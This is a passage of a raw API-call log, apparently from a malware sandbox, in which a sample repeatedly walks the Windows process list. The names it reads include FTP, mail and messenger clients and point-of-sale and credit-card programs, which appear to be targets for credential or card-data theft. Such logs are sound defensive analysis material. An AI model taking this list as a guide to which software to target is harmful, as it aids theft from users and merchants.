lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0210.195] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0210.197] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0210.250] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0210.254] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0210.257] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0210.260] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0210.265] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0210.269] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0210.273] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0210.275] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0210.282] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0210.284] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0210.286] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0210.288] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0210.290] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0210.306] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0210.312] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0210.314] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0210.316] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0210.318] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0210.319] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0210.321] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0210.323] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0210.327] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0210.329] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0210.331] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0210.333] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0210.334] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0210.336] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0210.338] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0210.342] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0210.344] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0210.345] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0210.347] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0210.349] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0210.350] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0210.352] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0210.354] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0210.391] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0210.393] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0210.395] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0210.396] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0210.398] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0210.400] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.401] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.406] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0210.408] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0210.410] CloseHandle (hObject=0xde8) returned 1 [0210.410] Sleep (dwMilliseconds=0x64) [0210.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0210.525] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.536] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.538] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.540] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.541] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.545] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.547] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.548] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.550] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.552] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.553] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.555] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.556] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.561] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.562] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.564] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.565] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.567] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.568] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.569] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.571] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0210.572] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0210.610] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.611] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.613] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0210.615] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0210.616] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0210.618] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0210.619] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.624] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.625] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.627] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.628] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.629] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0210.631] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0210.632] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0210.634] Process32Next (in: 